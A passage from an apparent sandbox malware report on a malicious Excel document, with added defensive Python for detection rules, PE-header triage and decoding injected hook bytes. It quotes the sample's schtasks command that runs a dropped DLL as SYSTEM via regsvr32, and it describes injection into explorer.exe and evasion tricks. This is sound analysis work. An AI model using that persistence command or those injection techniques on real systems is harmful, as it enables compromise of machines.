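    return basename(ev["image"]) == "reg.exe" and " add " in c and "windows defender\\exclusions" in c


def rule_schtasks_as_system(ev):
    c = ev["cmdline"].lower()
    return (basename(ev["image"]) == "schtasks.exe" and "/create" in c
            and re.search(r"/ru\s+'?(nt authority\\)?system", c) is not None)


RULES = {
    "office_spawns_lolbin": rule_office_spawns_lolbin,
    "regsvr32_without_dll": rule_regsvr32_without_dll,
    "regsvr32_spawns_explorer": rule_regsvr32_spawns_explorer,
    "defender_exclusion_via_reg": rule_defender_exclusion_via_reg,
    "schtasks_as_system": rule_schtasks_as_system,
}


def run_rules(lines):
    """Return (rule name, parent basename, child command line) for every rule that fires."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        if ev is None:
            continue
        for name, check in RULES.items():
            if check(ev):
                hits.append((name, basename(ev["parent"]), ev["cmdline"]))
    return hits


if __name__ == "__main__":
    for name, parent, cmdline in run_rules(SAMPLE_EVENTS):
        print(f"{name:28s} parent={parent:14s} {cmdline[:70]}")
```

Each rule is deliberately narrow so that the same event can fire more than one of them (the first EXCEL.EXE line trips both the Office-parent rule and the regsvr32-without-DLL rule), which is how you would want the alerts to stack when triaging a real EDR feed.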
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Application Data\Microsoft\Forms Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRD087.tmp Jump to behavior
Source: classification engine Classification label: mal100.expl.evad.winXLS@33/12@0/3
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_1000D523 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,SysAllocString,CoSetProxyBlanket, 4_2_1000D523
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: Compensation-1730406737-09272021.xls OLE indicator, Workbook stream: true
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_1000ABA3 CreateToolhelp32Snapshot,memset,Process32First,Process32Next,CloseHandle, 4_2_1000ABA3
Source: C:\Windows\SysWOW64\explorer.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\{BB664AD5-33F0-401E-9904-CDFCDB509CFF}
Source: C:\Windows\SysWOW64\explorer.exe Mutant created: \BaseNamedObjects\{8402844E-5395-47D4-81FA-4A2D74AF4E12}
Source: C:\Windows\SysWOW64\explorer.exe Mutant created: \BaseNamedObjects\Global\{0D1414CC-BF73-45B0-83AD-1EA17EEB389B}
Source: C:\Windows\SysWOW64\explorer.exe Mutant created: \Sessions\1\BaseNamedObjects\{8402844E-5395-47D4-81FA-4A2D74AF4E12}
Source: C:\Windows\SysWOW64\explorer.exe Mutant created: \BaseNamedObjects\{0D1414CC-BF73-45B0-83AD-1EA17EEB389B}
Source: C:\Windows\SysWOW64\explorer.exe Mutant created: \Sessions\1\BaseNamedObjects\{BB664AD5-33F0-401E-9904-CDFCDB509CFF}
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Window found: window name: SysTabControl32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: amstream.pdb source: explorer.exe, 00000005.00000003.422309790.00000000027B1000.00000004.00000001.sdmp

Data Obfuscation:

Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_02833726 push 00000000h; mov dword ptr [esp], ebp 4_2_0283376E
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_02833726 push 00000000h; mov dword ptr [esp], edx 4_2_02833A0E
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_02833726 push 00000000h; mov dword ptr [esp], esi 4_2_02833B55
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_02833726 push esi; mov dword ptr [esp], 00000001h 4_2_02833D71
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_02833726 push 00000000h; mov dword ptr [esp], ecx 4_2_02833D9C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_02833726 push 00000000h; mov dword ptr [esp], ebp 4_2_02833E46
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_02833726 push 00000000h; mov dword ptr [esp], esi 4_2_02833E72
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_02833726 push 00000000h; mov dword ptr [esp], esi 4_2_02833F52
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_02833726 push 00000000h; mov dword ptr [esp], ebp 4_2_02833F76
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_02831424 push 00000000h; mov dword ptr [esp], ecx 4_2_02831460
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_02831424 push 00000000h; mov dword ptr [esp], ecx 4_2_0283159D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_0283242A push 00000000h; mov dword ptr [esp], esi 4_2_0283276D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_0283242A push 00000000h; mov dword ptr [esp], edi 4_2_0283288F
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_0283242A push 00000000h; mov dword ptr [esp], ebx 4_2_028328C3
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_0283242A push 00000000h; mov dword ptr [esp], edi 4_2_02832B65
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_02832C41 push 00000000h; mov dword ptr [esp], esi 4_2_02832D71
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_02832C41 push 00000000h; mov dword ptr [esp], esi 4_2_02832E73
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_02832C41 push 00000000h; mov dword ptr [esp], esi 4_2_0283336F
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_02832C41 push 00000000h; mov dword ptr [esp], ebp 4_2_028333F4
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_02832C41 push edi; mov dword ptr [esp], 00000004h 4_2_0283340B
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_02832C41 push 00000000h; mov dword ptr [esp], edx 4_2_0283346C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_02831000 push 00000000h; mov dword ptr [esp], ecx 4_2_028310E5
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_02831000 push 00000000h; mov dword ptr [esp], edx 4_2_0283112A
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_02831000 push 00000000h; mov dword ptr [esp], ecx 4_2_0283127C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_02831000 push edx; mov dword ptr [esp], 000FFFFFh 4_2_0283133C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_02831000 push 00000000h; mov dword ptr [esp], esi 4_2_02831356
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_02831D89 push 00000000h; mov dword ptr [esp], ebp 4_2_02831DAF
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_02831D89 push 00000000h; mov dword ptr [esp], ebp 4_2_02831F4B
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_02831D89 push 00000000h; mov dword ptr [esp], ebp 4_2_0283223C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_02831D89 push 00000000h; mov dword ptr [esp], ebx 4_2_028323A2
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_02831D89 push 00000000h; mov dword ptr [esp], ebp 4_2_02832400
PE file contains sections with non-standard names
Source: 44466.7022844907[1].dat.0.dr Static PE information: section name: .rdatat
Source: 44466.7022844907[1].dat.0.dr Static PE information: section name:
Source: 44466.7022844907[1].dat.0.dr Static PE information: section name:
Source: 44466.7022844907[1].dat.0.dr Static PE information: section name:
Source: Drezd.red.0.dr Static PE information: section name: .rdatat
Source: Drezd.red.0.dr Static PE information: section name:
Source: Drezd.red.0.dr Static PE information: section name:
Source: Drezd.red.0.dr Static PE information: section name:
Source: 44466.7022844907[2].dat.0.dr Static PE information: section name: .rdatat
Source: 44466.7022844907[2].dat.0.dr Static PE information: section name:
Source: 44466.7022844907[2].dat.0.dr Static PE information: section name:
Source: 44466.7022844907[2].dat.0.dr Static PE information: section name:
Source: Drezd1.red.0.dr Static PE information: section name: .rdatat
Source: Drezd1.red.0.dr Static PE information: section name:
Source: Drezd1.red.0.dr Static PE information: section name:
Source: Drezd1.red.0.dr Static PE information: section name:
Source: 44466.7022844907[3].dat.0.dr Static PE information: section name: .rdatat
Source: 44466.7022844907[3].dat.0.dr Static PE information: section name:
Source: 44466.7022844907[3].dat.0.dr Static PE information: section name:
Source: 44466.7022844907[3].dat.0.dr Static PE information: section name:
Source: Drezd2.red.0.dr Static PE information: section name: .rdatat
Source: Drezd2.red.0.dr Static PE information: section name:
Source: Drezd2.red.0.dr Static PE information: section name:
Source: Drezd2.red.0.dr Static PE information: section name:
Source: Drezd.red.5.dr Static PE information: section name: .rdatat
Source: Drezd.red.5.dr Static PE information: section name:
Source: Drezd.red.5.dr Static PE information: section name:
Source: Drezd.red.5.dr Static PE information: section name:
Source: Drezd1.red.10.dr Static PE information: section name: .rdatat
Source: Drezd1.red.10.dr Static PE information: section name:
Source: Drezd1.red.10.dr Static PE information: section name:
Source: Drezd1.red.10.dr Static PE information: section name:
Source: Drezd.red.15.dr Static PE information: section name: .rdatat
Source: Drezd.red.15.dr Static PE information: section name:
Source: Drezd.red.15.dr Static PE information: section name:
Source: Drezd.red.15.dr Static PE information: section name:
Source: Drezd2.red.17.dr Static PE information: section name: .rdatat
Source: Drezd2.red.17.dr Static PE information: section name:
Source: Drezd2.red.17.dr Static PE information: section name:
Source: Drezd2.red.17.dr Static PE information: section name:
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_1000DFAD LoadLibraryA,GetProcAddress, 4_2_1000DFAD
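Three of the static findings above describe one loader design: the dropped Drezd*.red files have no import directory at all, their section tables carry a ".rdatat" section (one character off from the legitimate ".rdata", so it passes a quick glance) plus three sections with empty names, and the regsvr32.exe code resolves its APIs at runtime through LoadLibraryA/GetProcAddress. A PE with an empty import table cannot call any API it does not locate itself, so the empty directory and the dynamic resolution belong together; either alone is weak, the pair on a freshly dropped file is a strong static indicator. The following is an added example, not code from the report or from the sample: a dependency-free walk of the DOS, COFF, optional and section headers that reports exactly these three conditions. Because the sample's bytes are not on this page, it runs over a constructed minimal PE32 header that mimics the layout the report describes (a ".rdatat" section, three nameless sections, no import directory) and is not executable code; the section-name allow-list is my own.

```python
import struct

# Section names a normally built PE carries; anything else is reported (list is my own choice).
STANDARD_SECTIONS = {".text", ".rdata", ".data", ".idata", ".edata", ".rsrc",
                     ".reloc", ".bss", ".tls", ".pdata", ".CRT", ".gfids", ".00cfg"}


def parse_pe(data):
    """Walk the DOS/NT headers and return (has_import_directory, [section names])."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    num_sections, = struct.unpack_from("<H", data, coff + 2)
    opt_size, = struct.unpack_from("<H", data, coff + 16)
    opt = coff + 20
    magic, = struct.unpack_from("<H", data, opt)
    if magic == 0x10B:        # PE32: 96-byte header before the data directories
        n_dirs_off, dirs_off = opt + 92, opt + 96
    elif magic == 0x20B:      # PE32+: 112 bytes
        n_dirs_off, dirs_off = opt + 108, opt + 112
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    n_dirs, = struct.unpack_from("<I", data, n_dirs_off)
    has_imports = False
    if n_dirs > 1:            # directory entry 1 is IMAGE_DIRECTORY_ENTRY_IMPORT
        imp_rva, imp_size = struct.unpack_from("<II", data, dirs_off + 8)
        has_imports = imp_rva != 0 and imp_size != 0
    sec_table = opt + opt_size      # section table follows the optional header
    names = []
    for i in range(num_sections):
        raw = data[sec_table + 40 * i: sec_table + 40 * i + 8]
        names.append(raw.rstrip(b"\0").decode("ascii", "replace"))
    return has_imports, names


def triage_pe(data):
    """Return the findings the report flags: no imports, nameless or non-standard sections."""
    has_imports, names = parse_pe(data)
    findings = []
    if not has_imports:
        findings.append("no import directory (APIs must be resolved at runtime, "
                        "e.g. via LoadLibraryA/GetProcAddress)")
    for idx, name in enumerate(names):
        if name == "":
            findings.append("section %d: nameless" % idx)
        elif name not in STANDARD_SECTIONS:
            findings.append("section %d: non-standard name %r" % (idx, name))
    return findings


def build_sample_pe(section_names, with_imports):
    """Constructed minimal PE32 header used as test input; not the sample, not runnable."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)           # e_lfanew: NT headers right after DOS header
    coff = struct.pack("<HHIIIHH", 0x14C, len(section_names), 0, 0, 0, 224, 0x2102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)              # PE32 magic
    struct.pack_into("<I", opt, 92, 16)                # NumberOfRvaAndSizes
    if with_imports:
        struct.pack_into("<II", opt, 104, 0x2000, 0x28)   # import directory RVA / size
    sections = b"".join(
        struct.pack("<8sIIIIIIHHI", name, 0x1000, 0x1000 * (i + 1), 0x200,
                    0x400 + 0x200 * i, 0, 0, 0, 0, 0x60000020)
        for i, name in enumerate(section_names))
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + sections


# Layout matching the report's findings for Drezd*.red: ".rdatat" plus three nameless sections, no imports.
SUSPECT = build_sample_pe([b".text", b".rdatat", b"", b"", b""], with_imports=False)
# Ordinary layout for comparison.
BENIGN = build_sample_pe([b".text", b".rdata", b".data", b".reloc"], with_imports=True)

if __name__ == "__main__":
    for label, blob in (("suspect", SUSPECT), ("benign", BENIGN)):
        print(label, triage_pe(blob) or ["clean"])
```

The walker trusts the header fields it reads; on a real dropped file you would additionally bounds-check e_lfanew and the section table against the file size, since a loader-grade PE is free to lie about both.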

Persistence and Installation Behavior:

Uses cmd line tools excessively to alter registry or file data
Source: C:\Windows\SysWOW64\explorer.exe Process created: reg.exe
Source: C:\Windows\SysWOW64\explorer.exe Process created: reg.exe
Source: C:\Windows\SysWOW64\explorer.exe Process created: reg.exe Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Process created: reg.exe Jump to behavior
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Drezd.red
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Drezd1.red
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Drezd2.red
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Drezd.red
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Drezd1.red Jump to dropped file
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Drezd.red Jump to dropped file
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Drezd2.red Jump to dropped file
Drops PE files
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7022844907[3].dat Jump to dropped file
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Drezd1.red Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7022844907[1].dat Jump to dropped file
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Drezd.red Jump to dropped file
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Drezd2.red Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7022844907[2].dat Jump to dropped file
Drops PE files to the user directory
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Drezd1.red Jump to dropped file
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Drezd.red Jump to dropped file
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Drezd2.red Jump to dropped file

Boot Survival:

Drops PE files to the user root directory
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Drezd1.red Jump to dropped file
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Drezd.red Jump to dropped file
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Drezd2.red Jump to dropped file
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn fpdnnxq /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 16:53 /ET 17:05

Hooking and other Techniques for Hiding and Protection:

Overwrites code with unconditional jumps - possibly setting hooks in a foreign process
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 2008 base: AE102D value: E9 BA 4C 5A FF Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 2608 base: AE102D value: E9 BA 4C 5A FF Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 2540 base: AE102D value: E9 BA 4C 5A FF Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 408 base: AE102D value: E9 BA 4C 5A FF Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2920 Thread sleep count: 48 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 2216 Thread sleep time: -100000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520 Thread sleep count: 52 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 2648 Thread sleep count: 72 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2932 Thread sleep count: 56 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2596 Thread sleep count: 53 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 2636 Thread sleep count: 45 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 2636 Thread sleep time: -104000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 788 Thread sleep count: 73 > 30 Jump to behavior
Found evasive API chain (date check)
Source: C:\Windows\SysWOW64\explorer.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Windows\SysWOW64\regsvr32.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\SysWOW64\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe Last function: Thread delayed
Found dropped PE file which has not been started or loaded
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7022844907[3].dat Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7022844907[1].dat Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7022844907[2].dat Jump to dropped file
Found evasive API chain checking for process token information
Source: C:\Windows\SysWOW64\regsvr32.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\SysWOW64\explorer.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\SysWOW64\regsvr32.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_1000D01F GetCurrentProcessId,GetModuleFileNameW,GetCurrentProcess,GetCurrentProcess,LookupAccountSidW,GetLastError,GetLastError,GetModuleFileNameW,GetLastError,MultiByteToWideChar,GetCurrentProcess,memset,GetVersionExA,GetCurrentProcess,GetSystemInfo,GetWindowsDirectoryW, 4_2_1000D01F
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_1000AEB4 FindFirstFileW,FindNextFileW, 4_2_1000AEB4
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0008AEB4 FindFirstFileW,FindNextFileW, 5_2_0008AEB4
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_1000AEB4 FindFirstFileW,FindNextFileW, 8_2_1000AEB4
Source: C:\Windows\SysWOW64\explorer.exe Code function: 10_2_0008AEB4 FindFirstFileW,FindNextFileW, 10_2_0008AEB4

Anti Debugging:

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_10005F82 EntryPoint,OutputDebugStringA,GetModuleHandleA,GetModuleFileNameW,GetLastError,memset,MultiByteToWideChar,GetFileAttributesW,CreateThread,SetLastError, 4_2_10005F82
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_1000DFAD LoadLibraryA,GetProcAddress, 4_2_1000DFAD
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_02834495 or ebx, dword ptr fs:[00000030h] 4_2_02834495
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_00D84495 or ebx, dword ptr fs:[00000030h] 8_2_00D84495
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_00085A61 RtlAddVectoredExceptionHandler, 5_2_00085A61

HIPS / PFW / Operating System Protection Evasion:

Maps a DLL or memory area into another process
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write Jump to behavior
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: B0000 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: AE102D Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: B0000 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: AE102D Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: B0000 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: AE102D Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: B0000 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: AE102D Jump to behavior
Allocates memory in foreign processes
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: C:\Windows\SysWOW64\explorer.exe base: B0000 protect: page read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: C:\Windows\SysWOW64\explorer.exe base: B0000 protect: page read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: C:\Windows\SysWOW64\explorer.exe base: B0000 protect: page read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: C:\Windows\SysWOW64\explorer.exe base: B0000 protect: page read and write Jump to behavior
Injects code into the Windows Explorer (explorer.exe)
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 2008 base: B0000 value: 9C Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 2008 base: AE102D value: E9 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 2608 base: B0000 value: 9C Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 2608 base: AE102D value: E9 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 2540 base: B0000 value: 9C Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 2540 base: AE102D value: E9 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 408 base: B0000 value: 9C Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 408 base: AE102D value: E9 Jump to behavior
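The "Overwrites code with unconditional jumps" entries earlier on this page and the "Injects code into the Windows Explorer" entries just above are two views of the same writes: in each of four explorer.exe instances (PIDs 2008, 2608, 2540, 408) regsvr32.exe allocates a region at 0xB0000, writes a byte sequence starting with 0x9C (the 32-bit pushfd opcode) there, and then patches five bytes at 0xAE102D with E9 BA 4C 5A FF, which is a JMP rel32. The report does not name the module that lives at 0xAE0000, so the page does not tell which function was hooked; what the bytes do tell is where the jump lands. As an added example (not part of the report), the following decodes the rel32 from the report's own lines, embedded as sample input: the displacement is signed, relative to the end of the 5-byte instruction, so the target is 0xAE102D + 5 + (-0xA5B346) = 0x85CEC, which sits inside the 0x85A61 to 0x94FC0 range where the report places the explorer.exe code functions (5_2_00085A61, 5_2_0008AEB4, 10_2_00091758, 10_2_00094FC0), i.e. the hook diverts execution into the injected code. The range bounds used for that check are taken from those function addresses and are an assumption about where the injected region ends. One caveat for anyone turning this into a signature: identical patch bytes across all four PIDs mean source and destination were at the same addresses in every explorer.exe instance of this run, so E9 BA 4C 5A FF at 0xAE102D is a good memory-scan indicator for this run and a poor general one, since the rel32 changes whenever either address moves.

```python
import re

# Sample input: the report's own "Memory written" lines, including the single-byte 0x9C write.
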